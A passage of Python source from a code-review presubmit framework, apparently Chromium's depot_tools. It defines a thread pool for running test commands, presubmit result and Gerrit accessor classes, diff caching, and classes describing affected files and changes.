with self.__lock:
if self.__got_sigint:
p.terminate()
self.__processes.add(p)
stdout, stderr = p.communicate(stdin)
code = p.returncode
with self.__lock:
self.__processes.discard(p)
if code in self.sigint_returncodes:
self.__on_sigint()
return stdout, stderr
sigint_handler = SigintHandler()
class Timer(object):
def __init__(self, timeout, fn):
self.completed = False
self._fn = fn
self._timer = threading.Timer(timeout, self._onTimer) if timeout else None
def __enter__(self):
if self._timer:
self._timer.start()
return self
def __exit__(self, _type, _value, _traceback):
if self._timer:
self._timer.cancel()
def _onTimer(self):
self._fn()
self.completed = True
class ThreadPool(object):
def __init__(self, pool_size=None, timeout=None):
self.timeout = timeout
self._pool_size = pool_size or multiprocessing.cpu_count()
self._messages = []
self._messages_lock = threading.Lock()
self._tests = []
self._tests_lock = threading.Lock()
self._nonparallel_tests = []
def _GetCommand(self, test):
vpython = 'vpython'
if test.python3:
vpython += '3'
if sys.platform == 'win32':
vpython += '.bat'
cmd = test.cmd
if cmd[0] == 'python':
cmd = list(cmd)
cmd[0] = vpython
elif cmd[0].endswith('.py'):
cmd = [vpython] + cmd
# On Windows, scripts on the current directory take precedence over PATH, so
# that when testing depot_tools on Windows, calling `vpython.bat` will
# execute the copy of vpython of the depot_tools under test instead of the
# one in the bot.
# As a workaround, we run the tests from the parent directory instead.
if (cmd[0] == vpython and
'cwd' in test.kwargs and
os.path.basename(test.kwargs['cwd']) == 'depot_tools'):
test.kwargs['cwd'] = os.path.dirname(test.kwargs['cwd'])
cmd[1] = os.path.join('depot_tools', cmd[1])
return cmd
def _RunWithTimeout(self, cmd, stdin, kwargs):
p = subprocess.Popen(cmd, **kwargs)
with Timer(self.timeout, p.terminate) as timer:
stdout, _ = sigint_handler.wait(p, stdin)
stdout = stdout.decode('utf-8', 'ignore')
if timer.completed:
stdout = 'Process timed out after %ss\n%s' % (self.timeout, stdout)
return p.returncode, stdout
def CallCommand(self, test):
"""Runs an external program.
This function converts invocation of .py files and invocations of 'python'
to vpython invocations.
"""
cmd = self._GetCommand(test)
try:
start = time_time()
returncode, stdout = self._RunWithTimeout(cmd, test.stdin, test.kwargs)
duration = time_time() - start
except Exception:
duration = time_time() - start
return test.message(
'%s\n%s exec failure (%4.2fs)\n%s' % (
test.name, ' '.join(cmd), duration, traceback.format_exc()))
if returncode != 0:
return test.message(
'%s\n%s (%4.2fs) failed\n%s' % (
test.name, ' '.join(cmd), duration, stdout))
if test.info:
return test.info('%s\n%s (%4.2fs)' % (test.name, ' '.join(cmd), duration))
def AddTests(self, tests, parallel=True):
if parallel:
self._tests.extend(tests)
else:
self._nonparallel_tests.extend(tests)
def RunAsync(self):
self._messages = []
def _WorkerFn():
while True:
test = None
with self._tests_lock:
if not self._tests:
break
test = self._tests.pop()
result = self.CallCommand(test)
if result:
with self._messages_lock:
self._messages.append(result)
def _StartDaemon():
t = threading.Thread(target=_WorkerFn)
t.daemon = True
t.start()
return t
while self._nonparallel_tests:
test = self._nonparallel_tests.pop()
result = self.CallCommand(test)
if result:
self._messages.append(result)
if self._tests:
threads = [_StartDaemon() for _ in range(self._pool_size)]
for worker in threads:
worker.join()
return self._messages
def normpath(path):
'''Version of os.path.normpath that also changes backward slashes to
forward slashes when not running on Windows.
'''
# This is safe to always do because the Windows version of os.path.normpath
# will replace forward slashes with backward slashes.
path = path.replace(os.sep, '/')
return os.path.normpath(path)
def _RightHandSideLinesImpl(affected_files):
"""Implements RightHandSideLines for InputApi and GclChange."""
for af in affected_files:
lines = af.ChangedContents()
for line in lines:
yield (af, line[0], line[1])
def prompt_should_continue(prompt_string):
sys.stdout.write(prompt_string)
sys.stdout.flush()
response = sys.stdin.readline().strip().lower()
return response in ('y', 'yes')
def _ShouldRunPresubmit(script_text, use_python3):
"""Try to figure out whether these presubmit checks should be run under
python2 or python3. We need to do this without actually trying to
compile the text, since the text might compile in one but not the
other.
Args:
script_text: The text of the presubmit script.
use_python3: if true, will use python3 instead of python2 by default
if USE_PYTHON3 is not specified.
Return:
A boolean if presubmit should be executed
"""
m = re.search('^USE_PYTHON3 = (True|False)$', script_text, flags=re.MULTILINE)
if m:
use_python3 = m.group(1) == 'True'
return ((sys.version_info.major == 2) and not use_python3) or \
((sys.version_info.major == 3) and use_python3)
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitResult(object):
"""Base class for result objects."""
fatal = False
should_prompt = False
def __init__(self, message, items=None, long_text=''):
"""
message: A short one-line message to indicate errors.
items: A list of short strings to indicate where errors occurred.
long_text: multi-line text output, e.g. from another tool
"""
self._message = message
self._items = items or []
self._long_text = _PresubmitResult._ensure_str(long_text.rstrip())
@staticmethod
def _ensure_str(val):
"""
val: A "stringish" value. Can be any of str, unicode or bytes.
returns: A str after applying encoding/decoding as needed.
Assumes/uses UTF-8 for relevant inputs/outputs.
We'd prefer to use six.ensure_str but our copy of six is old :(
"""
if isinstance(val, str):
return val
if six.PY2 and isinstance(val, unicode):
return val.encode()
if six.PY3 and isinstance(val, bytes):
return val.decode()
raise ValueError("Unknown string type %s" % type(val))
def handle(self):
sys.stdout.write(self._message)
sys.stdout.write('\n')
for index, item in enumerate(self._items):
sys.stdout.write(' ')
# Write separately in case it's unicode.
sys.stdout.write(str(item))
if index < len(self._items) - 1:
sys.stdout.write(' \\')
sys.stdout.write('\n')
if self._long_text:
sys.stdout.write('\n***************\n')
# Write separately in case it's unicode.
sys.stdout.write(self._long_text)
sys.stdout.write('\n***************\n')
def json_format(self):
return {
'message': self._message,
'items': [str(item) for item in self._items],
'long_text': self._long_text,
'fatal': self.fatal
}
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitError(_PresubmitResult):
"""A hard presubmit error."""
fatal = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitPromptWarning(_PresubmitResult):
"""An warning that prompts the user if they want to continue."""
should_prompt = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitNotifyResult(_PresubmitResult):
"""Just print something to the screen -- but it's not even a warning."""
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _MailTextResult(_PresubmitResult):
"""A warning that should be included in the review request email."""
def __init__(self, *args, **kwargs):
super(_MailTextResult, self).__init__()
raise NotImplementedError()
class GerritAccessor(object):
"""Limited Gerrit functionality for canned presubmit checks to work.
To avoid excessive Gerrit calls, caches the results.
"""
def __init__(self, url=None, project=None, branch=None):
self.host = urlparse.urlparse(url).netloc if url else None
self.project = project
self.branch = branch
self.cache = {}
self.code_owners_enabled = None
def _FetchChangeDetail(self, issue):
# Separate function to be easily mocked in tests.
try:
return gerrit_util.GetChangeDetail(
self.host, str(issue),
['ALL_REVISIONS', 'DETAILED_LABELS', 'ALL_COMMITS'])
except gerrit_util.GerritError as e:
if e.http_status == 404:
raise Exception('Either Gerrit issue %s doesn\'t exist, or '
'no credentials to fetch issue details' % issue)
raise
def GetChangeInfo(self, issue):
"""Returns labels and all revisions (patchsets) for this issue.
The result is a dictionary according to Gerrit REST Api.
https://gerrit-review.googlesource.com/Documentation/rest-api.html
However, API isn't very clear what's inside, so see tests for example.
"""
assert issue
cache_key = int(issue)
if cache_key not in self.cache:
self.cache[cache_key] = self._FetchChangeDetail(issue)
return self.cache[cache_key]
def GetChangeDescription(self, issue, patchset=None):
"""If patchset is none, fetches current patchset."""
info = self.GetChangeInfo(issue)
# info is a reference to cache. We'll modify it here adding description to
# it to the right patchset, if it is not yet there.
# Find revision info for the patchset we want.
if patchset is not None:
for rev, rev_info in info['revisions'].items():
if str(rev_info['_number']) == str(patchset):
break
else:
raise Exception('patchset %s doesn\'t exist in issue %s' % (
patchset, issue))
else:
rev = info['current_revision']
rev_info = info['revisions'][rev]
return rev_info['commit']['message']
def GetDestRef(self, issue):
ref = self.GetChangeInfo(issue)['branch']
if not ref.startswith('refs/'):
# NOTE: it is possible to create 'refs/x' branch,
# aka 'refs/heads/refs/x'. However, this is ill-advised.
ref = 'refs/heads/%s' % ref
return ref
def _GetApproversForLabel(self, issue, label):
change_info = self.GetChangeInfo(issue)
label_info = change_info.get('labels', {}).get(label, {})
values = label_info.get('values', {}).keys()
if not values:
return []
max_value = max(int(v) for v in values)
return [v for v in label_info.get('all', [])
if v.get('value', 0) == max_value]
def IsBotCommitApproved(self, issue):
return bool(self._GetApproversForLabel(issue, 'Bot-Commit'))
def IsOwnersOverrideApproved(self, issue):
return bool(self._GetApproversForLabel(issue, 'Owners-Override'))
def GetChangeOwner(self, issue):
return self.GetChangeInfo(issue)['owner']['email']
def GetChangeReviewers(self, issue, approving_only=True):
changeinfo = self.GetChangeInfo(issue)
if approving_only:
reviewers = self._GetApproversForLabel(issue, 'Code-Review')
else:
reviewers = changeinfo.get('reviewers', {}).get('REVIEWER', [])
return [r.get('email') for r in reviewers]
def UpdateDescription(self, description, issue):
gerrit_util.SetCommitMessage(self.host, issue, description, notify='NONE')
def IsCodeOwnersEnabledOnRepo(self):
if self.code_owners_enabled is None:
self.code_owners_enabled = gerrit_util.IsCodeOwnersEnabledOnRepo(
self.host, self.project)
return self.code_owners_enabled
class OutputApi(object):
"""An instance of OutputApi gets passed to presubmit scripts so that they
can output various types of results.
"""
PresubmitResult = _PresubmitResult
PresubmitError = _PresubmitError
PresubmitPromptWarning = _PresubmitPromptWarning
PresubmitNotifyResult = _PresubmitNotifyResult
MailTextResult = _MailTextResult
def __init__(self, is_committing):
self.is_committing = is_committing
self.more_cc = []
def AppendCC(self, cc):
"""Appends a user to cc for this change."""
self.more_cc.append(cc)
def PresubmitPromptOrNotify(self, *args, **kwargs):
"""Warn the user when uploading, but only notify if committing."""
if self.is_committing:
return self.PresubmitNotifyResult(*args, **kwargs)
return self.PresubmitPromptWarning(*args, **kwargs)
class InputApi(object):
"""An instance of this object is passed to presubmit scripts so they can
know stuff about the change they're looking at.
"""
# Method could be a function
# pylint: disable=no-self-use
# File extensions that are considered source files from a style guide
# perspective. Don't modify this list from a presubmit script!
#
# Files without an extension aren't included in the list. If you want to
# filter them as source files, add r'(^|.*?[\\\/])[^.]+$' to the allow list.
# Note that ALL CAPS files are skipped in DEFAULT_FILES_TO_SKIP below.
DEFAULT_FILES_TO_CHECK = (
# C++ and friends
r'.+\.c$', r'.+\.cc$', r'.+\.cpp$', r'.+\.h$', r'.+\.m$', r'.+\.mm$',
r'.+\.inl$', r'.+\.asm$', r'.+\.hxx$', r'.+\.hpp$', r'.+\.s$', r'.+\.S$',
# Scripts
r'.+\.js$', r'.+\.py$', r'.+\.sh$', r'.+\.rb$', r'.+\.pl$', r'.+\.pm$',
# Other
r'.+\.java$', r'.+\.mk$', r'.+\.am$', r'.+\.css$', r'.+\.mojom$',
r'.+\.fidl$'
)
# Path regexp that should be excluded from being considered containing source
# files. Don't modify this list from a presubmit script!
DEFAULT_FILES_TO_SKIP = (
r'testing_support[\\\/]google_appengine[\\\/].*',
r'.*\bexperimental[\\\/].*',
# Exclude third_party/.* but NOT third_party/{WebKit,blink}
# (crbug.com/539768 and crbug.com/836555).
r'.*\bthird_party[\\\/](?!(WebKit|blink)[\\\/]).*',
# Output directories (just in case)
r'.*\bDebug[\\\/].*',
r'.*\bRelease[\\\/].*',
r'.*\bxcodebuild[\\\/].*',
r'.*\bout[\\\/].*',
# All caps files like README and LICENCE.
r'.*\b[A-Z0-9_]{2,}$',
# SCM (can happen in dual SCM configuration). (Slightly over aggressive)
r'(|.*[\\\/])\.git[\\\/].*',
r'(|.*[\\\/])\.svn[\\\/].*',
# There is no point in processing a patch file.
r'.+\.diff$',
r'.+\.patch$',
)
def __init__(self, change, presubmit_path, is_committing,
verbose, gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
"""Builds an InputApi object.
Args:
change: A presubmit.Change object.
presubmit_path: The path to the presubmit script being processed.
is_committing: True if the change is about to be committed.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
"""
# Version number of the presubmit_support script.
self.version = [int(x) for x in __version__.split('.')]
self.change = change
self.is_committing = is_committing
self.gerrit = gerrit_obj
self.dry_run = dry_run
self.parallel = parallel
self.thread_pool = thread_pool or ThreadPool()
# We expose various modules and functions as attributes of the input_api
# so that presubmit scripts don't have to import them.
self.ast = ast
self.basename = os.path.basename
self.cpplint = cpplint
self.fnmatch = fnmatch
self.gclient_paths = gclient_paths
# TODO(yyanagisawa): stop exposing this when python3 become default.
# Since python3's tempfile has TemporaryDirectory, we do not need this.
self.temporary_directory = gclient_utils.temporary_directory
self.glob = glob.glob
self.json = json
self.logging = logging.getLogger('PRESUBMIT')
self.os_listdir = os.listdir
self.os_path = os.path
self.os_stat = os.stat
self.os_walk = os.walk
self.re = re
self.subprocess = subprocess
self.sys = sys
self.tempfile = tempfile
self.time = time
self.unittest = unittest
if sys.version_info.major == 2:
self.urllib2 = urllib2
self.urllib_request = urllib_request
self.urllib_error = urllib_error
self.is_windows = sys.platform == 'win32'
# Set python_executable to 'vpython' in order to allow scripts in other
# repos (e.g. src.git) to automatically pick up that repo's .vpython file,
# instead of inheriting the one in depot_tools.
self.python_executable = 'vpython'
# Offer a python 3 executable for use during the migration off of python 2.
self.python3_executable = 'vpython3'
self.environ = os.environ
# InputApi.platform is the platform you're currently running on.
self.platform = sys.platform
self.cpu_count = multiprocessing.cpu_count()
# The local path of the currently-being-processed presubmit script.
self._current_presubmit_path = os.path.dirname(presubmit_path)
# We carry the canned checks so presubmit scripts can easily use them.
self.canned_checks = presubmit_canned_checks
# Temporary files we must manually remove at the end of a run.
self._named_temporary_files = []
self.owners_client = None
if self.gerrit:
self.owners_client = owners_client.GetCodeOwnersClient(
root=change.RepositoryRoot(),
upstream=change.UpstreamBranch(),
host=self.gerrit.host,
project=self.gerrit.project,
branch=self.gerrit.branch)
self.owners_db = owners_db.Database(
change.RepositoryRoot(), fopen=open, os_path=self.os_path)
self.owners_finder = owners_finder.OwnersFinder
self.verbose = verbose
self.Command = CommandData
# Replace <hash_map> and <hash_set> as headers that need to be included
# with 'base/containers/hash_tables.h' instead.
# Access to a protected member _XX of a client class
# pylint: disable=protected-access
self.cpplint._re_pattern_templates = [
(a, b, 'base/containers/hash_tables.h')
if header in ('<hash_map>', '<hash_set>') else (a, b, header)
for (a, b, header) in cpplint._re_pattern_templates
]
def SetTimeout(self, timeout):
self.thread_pool.timeout = timeout
def PresubmitLocalPath(self):
"""Returns the local path of the presubmit script currently being run.
This is useful if you don't want to hard-code absolute paths in the
presubmit script. For example, It can be used to find another file
relative to the PRESUBMIT.py script, so the whole tree can be branched and
the presubmit script still works, without editing its content.
"""
return self._current_presubmit_path
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Same as input_api.change.AffectedFiles() except only lists files
(and optionally directories) in the same directory as the current presubmit
script, or subdirectories thereof. Note that files are listed using the OS
path separator, so backslashes are used as separators on Windows.
"""
dir_with_slash = normpath('%s/' % self.PresubmitLocalPath())
if len(dir_with_slash) == 1:
dir_with_slash = ''
return list(filter(
lambda x: normpath(x.AbsoluteLocalPath()).startswith(dir_with_slash),
self.change.AffectedFiles(include_deletes, file_filter)))
def LocalPaths(self):
"""Returns local paths of input_api.AffectedFiles()."""
paths = [af.LocalPath() for af in self.AffectedFiles()]
logging.debug('LocalPaths: %s', paths)
return paths
def AbsoluteLocalPaths(self):
"""Returns absolute local paths of input_api.AffectedFiles()."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Same as input_api.change.AffectedTestableFiles() except only lists files
in the same directory as the current presubmit script, or subdirectories
thereof.
"""
if include_deletes is not None:
warn('AffectedTestableFiles(include_deletes=%s)'
' is deprecated and ignored' % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return list(filter(
lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs)))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def FilterSourceFile(self,
affected_file,
files_to_check=None,
files_to_skip=None,
allow_list=None,
block_list=None):
"""Filters out files that aren't considered 'source file'.
If files_to_check or files_to_skip is None, InputApi.DEFAULT_FILES_TO_CHECK
and InputApi.DEFAULT_FILES_TO_SKIP is used respectively.
The lists will be compiled as regular expression and
AffectedFile.LocalPath() needs to pass both list.
Note: Copy-paste this function to suit your needs or use a lambda function.
"""
if files_to_check is None:
files_to_check = self.DEFAULT_FILES_TO_CHECK
if files_to_skip is None:
files_to_skip = self.DEFAULT_FILES_TO_SKIP
def Find(affected_file, items):
local_path = affected_file.LocalPath()
for item in items:
if self.re.match(item, local_path):
return True
return False
return (Find(affected_file, files_to_check) and
not Find(affected_file, files_to_skip))
def AffectedSourceFiles(self, source_file):
"""Filter the list of AffectedTestableFiles by the function source_file.
If source_file is None, InputApi.FilterSourceFile() is used.
"""
if not source_file:
source_file = self.FilterSourceFile
return list(filter(source_file, self.AffectedTestableFiles()))
def RightHandSideLines(self, source_file_filter=None):
"""An iterator over all text lines in 'new' version of changed files.
Only lists lines from new or modified text files in the change that are
contained by the directory of the currently executing presubmit script.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
Note: The carriage return (LF or CR) is stripped off.
"""
files = self.AffectedSourceFiles(source_file_filter)
return _RightHandSideLinesImpl(files)
def ReadFile(self, file_item, mode='r'):
"""Reads an arbitrary file.
Deny reading anything outside the repository.
"""
if isinstance(file_item, AffectedFile):
file_item = file_item.AbsoluteLocalPath()
if not file_item.startswith(self.change.RepositoryRoot()):
raise IOError('Access outside the repository root is denied.')
return gclient_utils.FileRead(file_item, mode)
def CreateTemporaryFile(self, **kwargs):
"""Returns a named temporary file that must be removed with a call to
RemoveTemporaryFiles().
All keyword arguments are forwarded to tempfile.NamedTemporaryFile(),
except for |delete|, which is always set to False.
Presubmit checks that need to create a temporary file and pass it for
reading should use this function instead of NamedTemporaryFile(), as
Windows fails to open a file that is already open for writing.
with input_api.CreateTemporaryFile() as f:
f.write('xyz')
f.close()
input_api.subprocess.check_output(['script-that', '--reads-from',
f.name])
Note that callers of CreateTemporaryFile() should not worry about removing
any temporary file; this is done transparently by the presubmit handling
code.
"""
if 'delete' in kwargs:
# Prevent users from passing |delete|; we take care of file deletion
# ourselves and this prevents unintuitive error messages when we pass
# delete=False and 'delete' is also in kwargs.
raise TypeError('CreateTemporaryFile() does not take a "delete" '
'argument, file deletion is handled automatically by '
'the same presubmit_support code that creates InputApi '
'objects.')
temp_file = self.tempfile.NamedTemporaryFile(delete=False, **kwargs)
self._named_temporary_files.append(temp_file.name)
return temp_file
@property
def tbr(self):
"""Returns if a change is TBR'ed."""
return 'TBR' in self.change.tags or self.change.TBRsFromDescription()
def RunTests(self, tests_mix, parallel=True):
tests = []
msgs = []
for t in tests_mix:
if isinstance(t, OutputApi.PresubmitResult) and t:
msgs.append(t)
else:
assert issubclass(t.message, _PresubmitResult)
tests.append(t)
if self.verbose:
t.info = _PresubmitNotifyResult
if not t.kwargs.get('cwd'):
t.kwargs['cwd'] = self.PresubmitLocalPath()
self.thread_pool.AddTests(tests, parallel)
# When self.parallel is True (i.e. --parallel is passed as an option)
# RunTests doesn't actually run tests. It adds them to a ThreadPool that
# will run all tests once all PRESUBMIT files are processed.
# Otherwise, it will run them and return the results.
if not self.parallel:
msgs.extend(self.thread_pool.RunAsync())
return msgs
class _DiffCache(object):
"""Caches diffs retrieved from a particular SCM."""
def __init__(self, upstream=None):
"""Stores the upstream revision against which all diffs will be computed."""
self._upstream = upstream
def GetDiff(self, path, local_root):
"""Get the diff for a particular path."""
raise NotImplementedError()
def GetOldContents(self, path, local_root):
"""Get the old version for a particular path."""
raise NotImplementedError()
class _GitDiffCache(_DiffCache):
"""DiffCache implementation for git; gets all file diffs at once."""
def __init__(self, upstream):
super(_GitDiffCache, self).__init__(upstream=upstream)
self._diffs_by_file = None
def GetDiff(self, path, local_root):
if not self._diffs_by_file:
# Compute a single diff for all files and parse the output; should
# with git this is much faster than computing one diff for each file.
diffs = {}
# Don't specify any filenames below, because there are command line length
# limits on some platforms and GenerateDiff would fail.
unified_diff = scm.GIT.GenerateDiff(local_root, files=[], full_move=True,
branch=self._upstream)
# This regex matches the path twice, separated by a space. Note that
# filename itself may contain spaces.
file_marker = re.compile('^diff --git (?P<filename>.*) (?P=filename)$')
current_diff = []
keep_line_endings = True
for x in unified_diff.splitlines(keep_line_endings):
match = file_marker.match(x)
if match:
# Marks the start of a new per-file section.
diffs[match.group('filename')] = current_diff = [x]
elif x.startswith('diff --git'):
raise PresubmitFailure('Unexpected diff line: %s' % x)
else:
current_diff.append(x)
self._diffs_by_file = dict(
(normpath(path), ''.join(diff)) for path, diff in diffs.items())
if path not in self._diffs_by_file:
# SCM didn't have any diff on this file. It could be that the file was not
# modified at all (e.g. user used --all flag in git cl presubmit).
# Intead of failing, return empty string.
# See: https://crbug.com/808346.
logging.warning('No diff found for %s' % path)
return ''
return self._diffs_by_file[path]
def GetOldContents(self, path, local_root):
return scm.GIT.GetOldContents(local_root, path, branch=self._upstream)
class AffectedFile(object):
"""Representation of a file in a change."""
DIFF_CACHE = _DiffCache
# Method could be a function
# pylint: disable=no-self-use
def __init__(self, path, action, repository_root, diff_cache):
self._path = path
self._action = action
self._local_root = repository_root
self._is_directory = None
self._cached_changed_contents = None
self._cached_new_contents = None
self._diff_cache = diff_cache
logging.debug('%s(%s)', self.__class__.__name__, self._path)
def LocalPath(self):
"""Returns the path of this file on the local disk relative to client root.
This should be used for error messages but not for accessing files,
because presubmit checks are run with CWD=PresubmitLocalPath() (which is
often != client root).
"""
return normpath(self._path)
def AbsoluteLocalPath(self):
"""Returns the absolute path of this file on the local disk.
"""
return os.path.abspath(os.path.join(self._local_root, self.LocalPath()))
def Action(self):
"""Returns the action on this opened file, e.g. A, M, D, etc."""
return self._action
def IsTestableFile(self):
"""Returns True if the file is a text file and not a binary file.
Deleted files are not text file."""
raise NotImplementedError() # Implement when needed
def IsTextFile(self):
"""An alias to IsTestableFile for backwards compatibility."""
return self.IsTestableFile()
def OldContents(self):
"""Returns an iterator over the lines in the old version of file.
The old version is the file before any modifications in the user's
workspace, i.e. the 'left hand side'.
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
return self._diff_cache.GetOldContents(self.LocalPath(),
self._local_root).splitlines()
def NewContents(self):
"""Returns an iterator over the lines in the new version of file.
The new version is the file in the user's workspace, i.e. the 'right hand
side'.
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
if self._cached_new_contents is None:
self._cached_new_contents = []
try:
self._cached_new_contents = gclient_utils.FileRead(
self.AbsoluteLocalPath(), 'rU').splitlines()
except IOError:
pass # File not found? That's fine; maybe it was deleted.
except UnicodeDecodeError as e:
# log the filename since we're probably trying to read a binary
# file, and shouldn't be.
print('Error reading %s: %s' % (self.AbsoluteLocalPath(), e))
raise
return self._cached_new_contents[:]
def ChangedContents(self, keeplinebreaks=False):
"""Returns a list of tuples (line number, line text) of all new lines.
This relies on the scm diff output describing each changed code section
with a line of the form
^@@ <old line num>,<old size> <new line num>,<new size> @@$
"""
# Don't return cached results when line breaks are requested.
if not keeplinebreaks and self._cached_changed_contents is not None:
return self._cached_changed_contents[:]
result = []
line_num = 0
# The keeplinebreaks parameter to splitlines must be True or else the
# CheckForWindowsLineEndings presubmit will be a NOP.
for line in self.GenerateScmDiff().splitlines(keeplinebreaks):
m = re.match(r'^@@ [0-9\,\+\-]+ \+([0-9]+)\,[0-9]+ @@', line)
if m:
line_num = int(m.groups(1)[0])
continue
if line.startswith('+') and not line.startswith('++'):
result.append((line_num, line[1:]))
if not line.startswith('-'):
line_num += 1
# Don't cache results with line breaks.
if keeplinebreaks:
return result;
self._cached_changed_contents = result
return self._cached_changed_contents[:]
def __str__(self):
return self.LocalPath()
def GenerateScmDiff(self):
return self._diff_cache.GetDiff(self.LocalPath(), self._local_root)
class GitAffectedFile(AffectedFile):
"""Representation of a file in a change out of a git checkout."""
# Method 'NNN' is abstract in class 'NNN' but is not overridden
# pylint: disable=abstract-method
DIFF_CACHE = _GitDiffCache
def __init__(self, *args, **kwargs):
AffectedFile.__init__(self, *args, **kwargs)
self._server_path = None
self._is_testable_file = None
def IsTestableFile(self):
if self._is_testable_file is None:
if self.Action() == 'D':
# A deleted file is not testable.
self._is_testable_file = False
else:
self._is_testable_file = os.path.isfile(self.AbsoluteLocalPath())
return self._is_testable_file
class Change(object):
"""Describe a change.
Used directly by the presubmit scripts to query the current change being
tested.
Instance members:
tags: Dictionary of KEY=VALUE pairs found in the change description.
self.KEY: equivalent to tags['KEY']
"""
_AFFECTED_FILES = AffectedFile
# Matches key/value (or 'tag') lines in changelist descriptions.
TAG_LINE_RE = re.compile(
'^[ \t]*(?P<key>[A-Z][A-Z_0-9]*)[ \t]*=[ \t]*(?P<value>.*?)[ \t]*$')
scm = ''
def __init__(
self, name, description, local_root, files, issue, patchset, author,
upstream=None):
if files is None:
files = []
self._name = name
# Convert root into an absolute path.
self._local_root = os.path.abspath(local_root)
self._upstream = upstream
self.issue = issue
self.patchset = patchset
self.author_email = author
self._full_description = ''
self.tags = {}
self._description_without_tags = ''
self.SetDescriptionText(description)
assert all(
(isinstance(f, (list, tuple)) and len(f) == 2) for f in files), files
diff_cache = self._AFFECTED_FILES.DIFF_CACHE(self._upstream)
self._affected_files = [
self._AFFECTED_FILES(path, action.strip(), self._local_root, diff_cache)
for action, path in files
]
def UpstreamBranch(self):
"""Returns the upstream branch for the change."""
return self._upstream
def Name(self):
"""Returns the change name."""
return self._name
def DescriptionText(self):
"""Returns the user-entered changelist description, minus tags.
Any line in the user-provided description starting with e.g. 'FOO='
(whitespace permitted before and around) is considered a tag line. Such
lines are stripped out of the description this function returns.
"""
return self._description_without_tags
def FullDescriptionText(self):
"""Returns the complete changelist description including tags."""
return self._full_description
def SetDescriptionText(self, description):
"""Sets the full description text (including tags) to |description|.
Also updates the list of tags."""
self._full_description = description
# From the description text, build up a dictionary of key/value pairs
# plus the description minus all key/value or 'tag' lines.
description_without_tags = []
self.tags = {}
for line in self._full_description.splitlines():
m = self.TAG_LINE_RE.match(line)
if m:
self.tags[m.group('key')] = m.group('value')
else:
description_without_tags.append(line)
# Change back to text and remove whitespace at end.
self._description_without_tags = (
'\n'.join(description_without_tags).rstrip())
def AddDescriptionFooter(self, key, value):
"""Adds the given footer to the change description.
Args:
key: A string with the key for the git footer. It must conform to
the git footers format (i.e. 'List-Of-Tokens') and will be case
normalized so that each token is title-cased.
value: A string with the value for the git footer.
"""
description = git_footers.add_footer(
self.FullDescriptionText(), git_footers.normalize_name(key), value)
self.SetDescriptionText(description)
def RepositoryRoot(self):
"""Returns the repository (checkout) root directory for this change,
as an absolute path.
"""
return self._local_root
def __getattr__(self, attr):
"""Return tags directly as attributes on the object."""
if not re.match(r'^[A-Z_]*$', attr):
raise AttributeError(self, attr)
return self.tags.get(attr)
def GitFootersFromDescription(self):
"""Return the git footers present in the description.
Returns:
footers: A dict of {footer: [values]} containing a multimap of the footers
in the change description.
"""
return git_footers.parse_footers(self.FullDescriptionText())
def BugsFromDescription(self):
"""Returns all bugs referenced in the commit description."""
bug_tags = ['BUG', 'FIXED']
tags = []
for tag in bug_tags:
values = self.tags.get(tag)
if values:
tags += [value.strip() for value in values.split(',')]
footers = []
parsed = self.GitFootersFromDescription()
unsplit_footers = parsed.get('Bug', []) + parsed.get('Fixed', [])
for unsplit_footer in unsplit_footers:
footers += [b.strip() for b in unsplit_footer.split(',')]
return sorted(set(tags + footers))
def ReviewersFromDescription(self):
"""Returns all reviewers listed in the commit description."""
# We don't support a 'R:' git-footer for reviewers; that is in metadata.
tags = [r.strip() for r in self.tags.get('R', '').split(',') if r.strip()]
return sorted(set(tags))
def TBRsFromDescription(self):
"""Returns all TBR reviewers listed in the commit description."""
tags = [r.strip() for r in self.tags.get('TBR', '').split(',') if r.strip()]
# TODO(crbug.com/839208): Remove support for 'Tbr:' when TBRs are
# programmatically determined by self-CR+1s.
footers = self.GitFootersFromDescription().get('Tbr', [])
return sorted(set(tags + footers))
# TODO(crbug.com/753425): Delete these once we're sure they're unused.
@property
def BUG(self):
return ','.join(self.BugsFromDescription())
@property
def R(self):
return ','.join(self.ReviewersFromDescription())
@property
def TBR(self):
return ','.join(self.TBRsFromDescription())
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
raise NotImplementedError()
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Returns a list of AffectedFile instances for all files in the change.
Args:
include_deletes: If false, deleted files will be filtered out.
file_filter: An additional filter to apply.
Returns:
[AffectedFile(path, action), AffectedFile(path, action)]
"""
affected = list(filter(file_filter, self._affected_files))
if include_deletes:
return affected
return list(filter(lambda x: x.Action() != 'D', affected))
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Return a list of the existing text files in a change."""
if include_deletes is not None:
warn('AffectedTeestableFiles(include_deletes=%s)'
' is deprecated and ignored' % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return list(filter(
lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs)))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def LocalPaths(self):
"""Convenience function."""
return [af.LocalPath() for af in self.AffectedFiles()]
def AbsoluteLocalPaths(self):
"""Convenience function."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def RightHandSideLines(self):
